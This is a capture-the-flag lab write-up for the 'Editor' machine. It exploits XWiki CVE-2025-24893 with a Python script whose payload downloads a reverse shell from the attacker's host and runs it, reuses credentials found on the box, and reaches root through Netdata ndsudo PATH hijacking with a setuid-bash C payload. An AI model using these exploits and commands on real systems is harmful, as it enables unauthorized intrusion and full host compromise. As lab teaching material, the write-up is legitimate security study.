Editor - Easy - Linux
Port Scan
The port scan shows that SSH is active on the machine. There are also two web servers active. The headers suggest a web application called XWiki is being hosted.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
# Nmap 7.95 scan initiated Sat Aug 2 16:38:29 2025 as: /usr/lib/nmap/nmap -sCV -p- -v -oN portscan.log 10.129.88.163
Nmap scan report for 10.129.88.163
Host is up (0.032s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open http Jetty 10.0.20
| http-methods:
| Supported Methods: OPTIONS GET HEAD PROPFIND LOCK UNLOCK
|_ Potentially risky methods: PROPFIND LOCK UNLOCK
| http-webdav-scan:
| Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
| Server Type: Jetty(10.0.20)
|_ WebDAV type: Unknown
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
|_http-server-header: Jetty(10.0.20)
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.129.88.163:8080/xwiki/bin/view/Main/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug 2 16:38:54 2025 -- 1 IP address (1 host up) scanned in 25.23 seconds
Inspecting Port 8080
The below screenshot shows the homepage of the XWiki web application.
Researching XWiki
Project Link: https://github.com/xwiki/xwiki-platform
1
XWiki is a light and powerful development platform that allows you to customize the wiki to your specific needs.
CVE-2025-24893
https://nvd.nist.gov/vuln/detail/CVE-2025-24893
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to SolrSearch. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to <host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20. If there is an output, and the title of the RSS feed contains Hello from search text:42, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit Main.SolrSearchMacros in SolrSearchMacros.xml on line 955 to match the rawResponse macro in macros.vm#L2824 with a content type of application/xml, instead of simply outputting the content of the feed.
Exploit Script
Below is a copy of the script I used to obtain remote code execution on the target. The payload needed to be URL encoded properly in order for it to work. The payload will curl a reverse shell, save it to disk and then execute it. For unknown reasons the payload would fail if it was piped directly into bash.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
import urllib.parse
# Exploit function
def exploit(base_url, payload):
encoded_payload = urllib.parse.quote(payload)
exploit_url = (
f"{base_url}/xwiki/bin/get/Main/SolrSearch?"
f"media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7d"
f"println({encoded_payload}.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d"
)
try:
print(f"[+] Sending request to: {exploit_url}")
response = requests.get(exploit_url, timeout=10)
if response.status_code == 200 and "root:" in response.text:
print("[✔] Exploit successful! Output received:")
print(response.text)
else:
print(f"[✖] Exploit failed. Status code: {response.status_code}")
except requests.exceptions.ConnectionError:
print("[✖] Connection failed. Target may be down.")
except requests.exceptions.Timeout:
print("[✖] Request timed out. Target is slow or unresponsive.")
except requests.exceptions.RequestException as e:
print(f"[✖] Unexpected error: {e}")
# Main execution
if __name__ == "__main__":
base_url = "http://editor.htb:8080"
payload = "'curl 10.10.14.103/shell -o /tmp/shell && bash /tmp/shell'"
exploit(base_url, payload)
Reverse Shell Obtained
The below screenshot shows the target reaching out to my web server which hosts the reverse shell payload.
Reverse shell obtained as the xwiki user.
Inspecting XWiki Configuration Files
After inspecting the file system for configuration files I eventually found where the database credentials are stored as shown below. I did inspect the MySQL database for hashes and found one for a user named neal. It was not possible to crack the hash and turned out to be a waste of time.
Password Reuse Test
There is a user called oliver on the target.
The password was valid for the oliver user and granted access via SSH.
Inspecting Netdata (/opt/netdata)
Project Link: https://github.com/netdata/netdata
Netdata is an open-source, real-time infrastructure monitoring platform. Monitor, detect, and act across your entire infrastructure.
PE - ndsudo
https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
The ndsudo tool shipped with affected versions of the Netdata Agent allows an attacker to run arbitrary programs with root permissions.
Exploiting ndsudo
Its worth mentioning that my first attempt involved tricking the binary into executing a bash script. I discovered that when the ndsudo binary would execute the bash script it would not preserve root privileges. In order to workaround this it was necessary to compile a binary which sets the uid to 0 and then executes a system command. The source code has been included below for reference.
1
2
3
4
5
6
7
8
#include <unistd.h>
#include <stdlib.h>
int main() {
setuid(0);
system("cat /root/root.txt > /tmp/flag.txt && cp /bin/bash /tmp/bash && chmod u+s /tmp/bash && /tmp/bash -p");
return 0;
}
The below screenshot shows how the payload was compiled and named.
The below screenshot shows how the payload was transferred onto the target and granted executable permissions. The system path was then modified to include the /tmp directory which is where the payload was located.
Running the ndsudo binary with the nvme-list parameter caused it to execute a binary called nvme. This call was hijacked by modifying the system path to prioritize /tmp. The payload was executed with preserved root permissions resulting in the system command being executed as root.
The below screenshot shows the entire process and the successful result of obtaining a root shell and capturing the root flag.







